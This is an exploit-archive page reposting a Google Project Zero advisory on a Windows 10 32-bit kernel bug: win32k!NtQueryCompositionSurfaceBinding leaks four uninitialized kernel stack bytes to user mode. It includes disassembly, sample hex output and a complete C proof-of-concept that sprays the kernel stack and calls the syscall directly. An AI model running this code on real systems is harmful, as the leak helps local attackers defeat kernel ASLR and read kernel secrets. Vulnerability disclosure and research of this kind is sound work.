首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Microsoft Windows Kernel - 'win32k!NtQueryCompositionSurfaceBinding' Stack Memor
来源:Google Security Research 作者:Google 发布时间:2017-09-19  
/* Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1307 We have discovered that the win32k!NtQueryCompositionSurfaceBinding system call discloses portions of uninitialized kernel stack memory to user-mode clients, as tested on Windows 10 32-bit. The output buffer, and the corresponding temporary stack-based buffer in the kernel are 0x308 bytes in size. The first 4 and the trailing 0x300 bytes are zero'ed out at the beginning of the function: --- cut --- .text:0001939B mov [ebp+var_324], ebx .text:000193A1 push 300h ; size_t .text:000193A6 push ebx ; int .text:000193A7 lea eax, [ebp+var_31C] .text:000193AD push eax ; void * .text:000193AE call _memset --- cut --- However, the remaining 4 bytes at offset 0x4 are never touched, and so they contain whatever data was written there by the previous system call. These 4 bytes are then subsequently leaked to the user-mode caller. Exploitation of this bug is further facilitated by the fact that the contents of the buffer are copied back to user-mode even if the syscall fails (e.g. composition surface handle can't be resolved etc). The attached proof-of-concept program demonstrates the disclosure by spraying the kernel stack with a large number of 0x41 ('A') marker bytes, and then calling the affected system call. An example output is as follows: --- cut --- 00000000: 00 00 00 00 41 41 41 41 00 00 00 00 00 00 00 00 ....AAAA........ 00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ [...] 000002b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000002c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000002d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000002e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000002f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000300: 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ................ --- cut --- It is clearly visible here that among all data copied from ring-0 to ring-3, 4 bytes at offset 0x4 remained uninitialized. Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space. */ #include #include extern "C" ULONG WINAPI NtMapUserPhysicalPages( PVOID BaseAddress, ULONG NumberOfPages, PULONG PageFrameNumbers ); // For native 32-bit execution. extern "C" ULONG CDECL SystemCall32(DWORD ApiNumber, ...) { __asm{mov eax, ApiNumber}; __asm{lea edx, ApiNumber + 4}; __asm{int 0x2e}; } VOID PrintHex(PBYTE Data, ULONG dwBytes) { for (ULONG i = 0; i < dwBytes; i += 16) { printf("%.8x: ", i); for (ULONG j = 0; j < 16; j++) { if (i + j < dwBytes) { printf("%.2x ", Data[i + j]); } else { printf("?? "); } } for (ULONG j = 0; j < 16; j++) { if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) { printf("%c", Data[i + j]); } else { printf("."); } } printf("\n"); } } VOID MyMemset(PBYTE ptr, BYTE byte, ULONG size) { for (ULONG i = 0; i < size; i++) { ptr[i] = byte; } } VOID SprayKernelStack() { // Buffer allocated in static program memory, hence doesn't touch the local stack. static BYTE buffer[4096]; // Fill the buffer with 'A's and spray the kernel stack. MyMemset(buffer, 'A', sizeof(buffer)); NtMapUserPhysicalPages(buffer, sizeof(buffer) / sizeof(DWORD), (PULONG)buffer); // Make sure that we're really not touching any user-mode stack by overwriting the buffer with 'B's. MyMemset(buffer, 'B', sizeof(buffer)); } int main() { // Windows 10 1607 32-bit. CONST ULONG __NR_NtQueryCompositionSurfaceBinding = 0x13e0; // Convert thread to GUI. LoadLibrary(L"user32.dll"); // Spray the kernel stack to get visible results of the memory disclosure. SprayKernelStack(); // Trigger the bug and display the output. BYTE OutputBuffer[0x308] = { /* zero padding */ }; SystemCall32(__NR_NtQueryCompositionSurfaceBinding, 0, 0, OutputBuffer); PrintHex(OutputBuffer, sizeof(OutputBuffer)); return 0; }
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft Windows Kernel - 'wi
·Apache - HTTP OPTIONS Memory L
·Microsoft Windows Kernel - 'wi
·HPE < 7.2 - Java Deserializati
·Microsoft Windows Kernel - 'wi
·Microsoft Edge 38.14393.1066.0
·Microsoft Windows Kernel - 'nt
·Disk Pulse Enterprise 9.9.16 G
·Microsoft Windows Kernel - 'wi
·Linux Kernel <= 4.13.1 - BlueT
·Microsoft Windows Kernel - 'wi
·Microsoft Edge - Chakra Incorr
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved